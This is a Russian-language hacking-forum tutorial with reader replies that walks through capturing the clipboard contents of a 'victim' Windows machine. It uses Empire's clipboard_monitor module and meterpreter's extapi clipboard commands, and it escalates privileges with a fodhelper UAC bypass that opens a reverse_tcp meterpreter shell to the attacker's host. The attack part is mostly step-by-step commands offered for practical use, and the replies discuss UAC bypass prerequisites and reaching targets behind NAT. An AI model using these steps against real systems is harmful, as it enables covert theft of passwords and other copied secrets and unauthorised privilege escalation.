Получение информации из буфера обмена Victim

O

OneDollar

Всем привет! Сегодня столкнулся с такой ситуаций, когда нужно взять информацию из буфера обмена Victim. Разобрался и решил создать лайтовую статью для вас, думаю каждому пригодится в арсенале такая фича! Проводить атаку мы будем в kali linux 2017.3, а атаковать будем многострадальный windows server 2012 R2 standart.

Работу выполним в двух фрамеворках:
1. Metasploit со своим незаменимым meterpreter-ом
2. Empire

Что нам для этого понадобится ? Как всегда это получении сессии ( агента ), об этом много статей на форуме, поэтому я не буду описывать этот момент, а просто предоставлю ссылки (если был бы новенький способ, я бы описал!)

Получении сессии в meterpreter и получение агента в empire

Ну приступим :

upload_2017-12-3_0-15-26.png

Получили мы агента в Empire. Идем в agents и смотрим, есть у нас права админа или нет. В моем случае они есть! Тому подтверждение * слева от названия машины

Код: 
agents

upload_2017-12-3_0-19-11.png

Переименуем имя чтобы было удобнее с ним работать, далее подключаемся к агенту и проверяем в info чтобы строка high_integrity была заполнена 1, это так же подтверждает что мы имеет права админа.

Код: 
rename (имя агента текущее) Codeby (новое имя агента)
interact Codeby
info

upload_2017-12-3_0-24-5.png

Видим что все отлично, можно работать ! Если мы получили агента с параметром high_integrity 0, то нужно сделать bypassuac. Пишем :

Код: 
usemodule privesc/bypassuac +TAB
info
set Listener http(у меня листенер так называется)
run

И выбираем модуль. Советую выбрать bypassuac_fodhelper т.к. сам его узаю. В нем пишем info и обычно заполняем листенера которого создавали для получения агента. Собственно и запускаем run

upload_2017-12-3_0-32-37.png

Все после атаки получаем нового агента со * и подключаемся к нему :

Код: 
interact (имя)

Ну теперь изи, пишем :

Код: 
usemodule collection/clipboard_monitor
info

upload_2017-12-3_0-35-7.png

Собственно здесь мы видим такой параметр как PollInterval он нам говорит. Задайте количество секунд, через которое ему чекать изменения в буфере (по дефолту 15 сек). Я выставил 2 секунды, вы смотрите сами.. )

Код: 
set PollInterval 2
run

Все, теперь после копирования информации у нас в империи появляется текст.

upload_2017-12-3_1-6-0.png

Prof1t

Теперь пришло время для метерпретера. Получили сессию и подключились к ней:

upload_2017-12-3_0-42-58.png

Код: 
sessions (N) где N номер сессии

И опять же, если сессия получена с правами обычного юзера что мало вероятно, то проделать нужно следующие действия:

Код: 
background
use exploit/windows/local/bypassuac_fodhelper
set SESSION N (где N номер сессии)
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.102 (свои данные)
set LPORT 5900 (свои данные)
run

upload_2017-12-3_5-14-34.png

upload_2017-12-3_5-16-7.png

Отлично, теперь подключимся и проверим права :

Код: 
sessions N (где N номер сессии)
run post/windows/gather/win_privs

upload_2017-12-3_0-50-35.png

Супер, права админа есть, системы нет, можно работать. Далее подгружаем :

Код: 
load extapi
help

upload_2017-12-3_0-54-43.png

Видим что данные успешно подгружены, можно работать.

Код: 
clipboard_monitor_start - начать запоминать
clipboard_get_data - дампануть что есть
clipboard_monitor_stop - остановить

upload_2017-12-3_1-1-19.png

P.S. с правами системы это не работает ! Только с правами админа.

Также работа проведена на машине Windows 10 с помощью тех же инструментов, все отлично работает.


На этом у меня все) Всем профит и до новых встреч !)
 

Вложения

  • upload_2017-12-3_0-18-54.png
    upload_2017-12-3_0-18-54.png
    15,6 КБ · Просмотры: 400
  • upload_2017-12-3_0-40-22.png
    upload_2017-12-3_0-40-22.png
    10,9 КБ · Просмотры: 504
Последнее редактирование модератором:
  • Нравится
Реакции: batu5ai, kot-gor, _Eliot_ и ещё 12
Очень понравилось описание автором ключевых моментов в данной статье без потери сессии:
Модули,которые работают с uac , не теряют своей актуальности,и успех проведения теста сервера во многом от этого зависит.
Великолепно описан обязательный процесс повышения привелегий и возврат к начальному его этапу без потери контроля.
Не лишним будет помнить и о миграции в процесс.
Технично поставлен акцент на правах system.Это очень хорошие привелегии,но в отдельных случаях,как можем убедиться,могут не сработать.В общем,разорил меня автор на +1 балл )),чем с удовольствием и делюсь.
 
  • Нравится
Реакции: Underwood, OneDollar, SlipX и ещё 2
все ясно разжовано и разложено по полочкам, мог бы и сам тыкнул +1 а так только "нравится" ;)
 
  • Нравится
Реакции: Dionis и OneDollar
Допустим я имею Шелл или метерпретер на правах обычного юзера,следовательно миграция требует прав,байпассы требуют прав,тогда в чем смысл?может быть я что то упустил,но не думаю.то есть я сделал это,но прав никак не получил,может быть я в чем то ошибаюсь,но не думаю.Даже на скринах видно что нужно быть в админ группе,что уже означает что некие права имеются.Вообщем я не пойму и на практике это не работает,или же поправьте меня.Естественно я могу получить привилегии через эксплойты вроде мс16-032 и кучу других сивиешек,но хоть убей я не пойму как получить права как в данной статье.Миграция требует прав,байпасс требует админ группу,и это не просто доводы,было опробовано на практике ещё до этой статьи.Тыкните меня носом в чем я не прав.Спасибо
 
karlomarx сказал(а):
Допустим я имею Шелл или метерпретер на правах обычного юзера,следовательно миграция требует прав,байпассы требуют прав,тогда в чем смысл?может быть я что то упустил,но не думаю.то есть я сделал это,но прав никак не получил,может быть я в чем то ошибаюсь,но не думаю.Даже на скринах видно что нужно быть в админ группе,что уже означает что некие права имеются.Вообщем я не пойму и на практике это не работает,или же поправьте меня.Естественно я могу получить привилегии через эксплойты вроде мс16-032 и кучу других сивиешек,но хоть убей я не пойму как получить права как в данной статье.Миграция требует прав,байпасс требует админ группу,и это не просто доводы,было опробовано на практике ещё до этой статьи.Тыкните меня носом в чем я не прав.Спасибо
Нажмите, чтобы раскрыть...
Каких прав требуют байпасы? Главное, что бы ваши права были (администратор). Как Вы их получаете, тут уже не важно. И почему не работает это на практике? Я ежедневно использую данный метод и причем на разных версиях виндовс. Я в статье описал метод получения привилегий админа. Довольно подробно с описанием каждого действия. Предоставьте хотя бы скриншоты с проблемой.. я постараюсь помочь
 
Тут опять я не понимаю.Каких прав требуют байпасс,и пишите что нужны права администратора.Потом как бы их снова получаете,понятно что если получить сессию на машину с привилегиями админа,не зная пароля,то да,байпас сработал,получили шелл с админом, делайте что хотите,это все ясно.Но вопрос остаётся,имея админа,я могу провести что хочу.Грубо говоря,в статье не получение прав,а обход uac уже на правах админа,вот и все.То есть для того чтобы сделать все что написано в статье,нужны изначальные привилегии.
 
karlomarx сказал(а):
Тут опять я не понимаю.Каких прав требуют байпасс,и пишите что нужны права администратора.Потом как бы их снова получаете,понятно что если получить сессию на машину с привилегиями админа,не зная пароля,то да,байпас сработал,получили шелл с админом, делайте что хотите,это все ясно.Но вопрос остаётся,имея админа,я могу провести что хочу.Грубо говоря,в статье не получение прав,а обход uac уже на правах админа,вот и все.То есть для того чтобы сделать все что написано в статье,нужны изначальные привилегии.
Нажмите, чтобы раскрыть...
Даже если пользователь запустил файл не от имени админа, то и этого достаточно, чтобы сделать обход UAC и тем самым получить привилегии администратора. При получении сессии уже есть все необходимое чтобы начать работу. Если ваш допустим батник был запущен от админа, то уже ничего не нужно делать. Стоит только подгрузить модуль и запустить. Если от юзера, то сделать bypassuac и все) подгрузить и запустить. Если не понятно, в лс попробую объяснить лично..
 
Есть вопрос по поводу получения агента в Empire от целевого пк находящегося за NAT роутера. Пробую на примере metasploit, но не то пальто :(
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ